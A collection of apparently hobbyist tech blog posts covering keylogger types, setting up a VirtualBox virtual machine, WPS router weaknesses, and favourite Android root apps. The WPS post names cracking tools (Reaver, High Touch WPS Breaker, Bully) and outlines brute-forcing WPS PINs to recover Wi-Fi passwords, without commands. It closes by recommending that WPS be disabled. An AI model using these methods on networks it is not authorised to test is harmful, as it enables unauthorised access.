Keyloggers

Keylogging “is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored”. It can be done with software or hardware, and can have malicious intents or for be used for things like human research.

There are many different kinds of software keyloggers.

  • Hypervisor-based: Layer of malware that can run underneath the operating system and exist as a seperate virtual machine to capture data.
  • Kernel-based: A program running on the computer requests root access in order to intercept keystrokes that pass through the kernel. This type of keylogger is very hard to detect and can take control of hardware.
  • API-based: This type of keylogger registers when certain keys are pressed through APIs and records them.
  • Form grabbing based:This type of logging is done when a user enters data into online forms, and the keylogger saves them before they are transmitted over the internet.
  • Javascript-based: A malicious script tag can be entered into a website, and it can track key events. This can happen through things such as XSS (Cross site scripting) and MITM (Man in the middle) attacks.
  • Memory injection based: This type of keylogger alters data tables in the browser and other system functions.
  • HTTP Packet based: This is done by capturing network traffic based on HTTP, which can be used to recover unencrypted passwords.
  • Remote Access based: These are keyloggers that can offload data to a remote location through hardware, online server, or an email address.

actual-keylogger

A software keylogger program.

While software keyloggers are powerful, hardware keyloggers can be embedded within the keyboard itself or as an external device that is hard to detect.  There are also various kinds of them.

  • Firmware-based: This is very low level BIOS firmware that is designed specifically for the hardware it’s running on to capture keystrokes.
  • Keyboard hardware: This can be done with an embedded circuit, or with and external inline device between the computer and keyboard.
  • Wireless keyboard and mouse sniffers: This is done by cracking the protocol used to transmit the data wirelessly to read data or even enter commands remotely.
  • Keyboard overlays: This technique is often used at ATMs to capture card PIN numbers. It is designed to blend into the machine’s design.
  • Acoustic keyloggers: This is a very advanced method that requires listening to the sounds that a keyboard makes in order to identify keystrokes.
  • Electromagnetic emissions: This is an attack that can capture emissions to see keystrokes from a distance.
  • Optical surveillance: This is a strategically placed camera, in order to capture keystrokes and pin numbers.

timestamp_hardware_keylogger_01

This is a hardware keylogger designed for PS/2 and USB keyboards.

As you can see, keyloggers are very dangerous and you should be aware of what websites you visit and any suspicious software. You should also check your computer for hardware loggers if you work in an office or environment with many other people.

Virtual Machines

A virtual machine is an emulation of a computer system. Many large servers may run various virtual machines with many different operating systems. As a consumer, you may want to be able to run other operating systems on top of your current host OS. An example would be running Windows on your Mac, or Linux on Windows. The combinations are endless, and can be very useful to run applications that don’t exist on the current platform you are on. There are various programs that let you virtualize OSes, and some of the most popular are VirtualBox, VMware Fusion, and Parallels. All of them have advantages and disadvantages, so you need to decide what’s best.

For example on one host machine, in this case a Mac, you can have various different operating systems.

virtualbox-main

By doing this, you are no longer restricted to the capabilities of your host OS.

capture

If you’ve ever wanted to try the Mac operating system without paying so much money, you can easily install it in a Virtual Machine and use it.

Setting up a virtual machine is very easy and only takes a few steps. First, you need to download the operating system you want to use. This is often in a disk image format such as a .iso file.

capture

After you download the file, often between 1 to 8 gigabytes, you need to install VirtualBox from virtualbox.org or some other virtualization software. For this tutorial, we are going to use VirtualBox.

Once you open the application, click new and choose the setup options for the version of the operating system you downloaded.

screen-shot-2015-07-29-at-8-25-43-pm

After this, you need to allocate the amount of RAM for the machine and create a virtual hard drive. These settings vary from computer to computer, and you can lookup what’s best for you.

screen-shot-2015-07-29-at-8-27-05-pmscreen-shot-2015-07-29-at-8-28-02-pm

After you do this, you will need to navigate to the OS .iso and also set amount of Video Memory.

screen-shot-2015-07-29-at-8-29-46-pmscreen-shot-2015-07-29-at-8-31-20-pm1

Finally, you can click OK and start the machine and proceed to set it up. Some have a Live CD option, which allows you to boot the OS temporarily instead of installing to the the VDI hard drive. Once inside the operating system, you may consider installing the Guest Additions packages to improve the usability and speed of the machine.

Wi-Fi Protected Setup (WPS)

WPS is a network security standard to create a secure wireless home network. It was created in order to allow end users to add devices to the network without entering long passwords.kb17336-001_en_v9

After you press the button on the router, you can easily connect to it by also clicking the WPS Push Button on your phone. Once the router recognizes the device, it securely transmits the data needed to associate with the access point to the phone.
screenshot_20170211-213336

From a non-technical standpoint, this seems very simple, but there are various vulnerabilities that can be exploited in this wireless standard.

If anyone gets physical access to your router and connects with WPS, you can recover the actual passphrase from it. Using a rooted Android phone and a password recovery app, you can select a network and view the passphrase.

download

Another big vulnerability is the ability for hackers to remotely brute force the WPS pin needed to connect. This is due to the fact that a WPS pin has only 8 numbers, and defines the number of possibilities there are to try.

By using an external Wi-Fi card and a Linux distro such as Kali-Linux, you can easily setup tools such as Reaver and High Touch WPS Breaker (HTWPS). These two tools take advantage of unsecured routers with old firmware to brute force the WPA key.

high-touch-wps-breaker

After typing 01, the software will return a list of networks that are open to the attack. Due to the fact that many manufacturers ship routers with this enabled, the list is often very long.

wps

In the image above, you see the PIN that has been returned. By using a tool called Bully, Kali Linux can retrieve the original password.

As you can see, WPS compromises security in exchange for convenience. A good security practice would be to disable this setting in your router settings page. This will block the hardware button from functioning and keep you safe from attacks.

 

Best Root Apps

Once you get your phone rooted, you may wonder what apps would be best to install first. Many of these apps can make your phone experience better or more customized.

The first app is Substratum. It is a theme engine for stock AOSP roms. It is very powerful and can theme your whole device to make it feel completely different. It uses OMS (Overlay Manager Service) to change everything.

It works very well and can theme the whole Android System UI as well as a majority of popular apps. Above you can see the all black themed Settings app.

Another great app is Titanium Backup. With this app, you can make full backups of all your apps and their data. This way, you can seamlessly transfer your data from one ROM to another. It is also helpful in case you lose any data. Since it is a root app, it can do many things such as batch backup and an restore with no user interaction.

You can see the list of apps it has, the options for each individual app, and batch actions that you can schedule at different times.

The last app is very powerful and goes by the name of Kernel Auditor. This app provides control over device hardware, such as CPU/GPU clock speed, sensor input control, and underclocking.

Changing these settings can be very dangerous however, so you should only install the app if you know what they do. If used right, it can save battery and make your device smoother.

These are just 3 of the many great root apps that I would recommend, but there are many more useful ones that are out there for you to find.